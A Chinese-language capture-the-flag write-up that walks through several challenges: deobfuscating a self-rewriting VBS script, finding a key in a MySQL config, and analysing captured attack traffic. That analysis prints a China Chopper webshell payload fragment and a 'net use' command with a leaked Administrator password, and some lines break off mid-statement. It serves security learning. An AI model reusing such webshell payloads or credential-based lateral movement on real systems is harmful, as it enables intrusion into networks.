1.小白鼠与蝙蝠的故事
下载题目压缩包解出来是一个vbs文件,这题就是考验vbs能力了,如果是学c语言的人会感觉有点吃力。
第一步千万!千万!千万!不要直接运行vbs(不管是不是这题还是其他vbs),这会有风险,先复制个副本在虚拟机(当然本题没那么危险啦)运行下,弹出框显示”this_is_key”,(⊙0⊙)如果有那么简单就好了,这里要注意下,当运行后这个vbs,原文件会被改写(幸好运行的是副本)。用txt等打开最早的原文件,是只有一长行的代码。VB中的冒 (:)起分隔语句的作用,使得一行可以有几个语句。看着一长串比较麻烦,自己手动格式化下:
code=”…”
key=9
code=rev
Execute code
Function rev()
For i=1 To Len(code) Step key
rev=rev+strReverse(Mid(code,i,key))
Next
End Function
0) 用两个双引 转义表示字符串内容中的一个双引 。
1) 看到rev=rev+这种操作函数名的行为不要慌,因为VB中是通过给函数名赋值来返回值的。
2) For 变量名=初值 To 终值(有包含) Step 步长 (每一个For要对应每一个Next)
3) Mid(str,M,N) 截取字符串中从第M位(包含)起N个长,记得起始位置是从第1开始。
4) StrReverse是字符串逆序
5) Execute是个函数,执行一个或多个语句,忽略语句的返回值。
有这些语法知识傍身,稍微理解下就是把code字符串每key个长度逆序,然后再执行这个code,而我们要解题的话只要把
Execute code:
替换为
Set objfso=CreateObject(“scripting.filesystemobject”):Set objTextFile
2.你有记日志的习惯吗
附件的压缩包下载后,解压后有不少文件,起初我找了一些log文件和config文件,都看得晕晕的。最后经人提醒mysql有一个配置文件my.cnf,搜索它,也就是在wwwlamppetc里面,打开它就看到KEY了。
Flag:
http://127.0.0.1/CMS/www/lampp/etc/my.cnf
3.西普CTF-可启动的磁盘镜像
http://hebin.me/2017/09/09/%E8%A5%BF%E6%99%AEctf-%E5%8F%AF%E5%90%AF%E5%8A%A8%E7%9A%84%E7%A3%81%E7%9B%98%E9%95%9C%E5%83%8F/
4.ruby
5.这是捕获的黑客攻击数据包,Administrator用户的密码在此次攻击中泄露了,你能找到吗br>
很简单,题目意思简单明了,用wireshark分析数据包就行了
ip.addr == 192.168.30.101 and http
查看数据包发现是菜刀链接
z0:@ini_set(“display_errors”,”0″);@set_time_limit(0);@set_magic_quotes_runtime(0);echo(“->|”);;$p=base64_decode($_POST[“z1”]);$s=base64_decode($_POST[“z2”]);$d=dirname(
z1:Y21k
z2:cd /d “c:inetpubwwwroot”&net use \192.168.30.184C$ “”Test!@#123″” /u:Administrator&echo [S]&cd&echo [E]
6.内 攻击数据包,请分析
Session Setup AndX Request (0x73)
Word Count (WCT): 13
AndXCommand: Tree Connect AndX (0x75)
Reserved: 00
AndXOffset: 292
Max Buffer: 4356
Max Mpx Count: 2
VC Number: 0
Session Key: 0x00000000
ANSI Password Length: 24
Unicode Password Length: 24
Reserved: 00000000
Capabilities: 0x000000d4
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!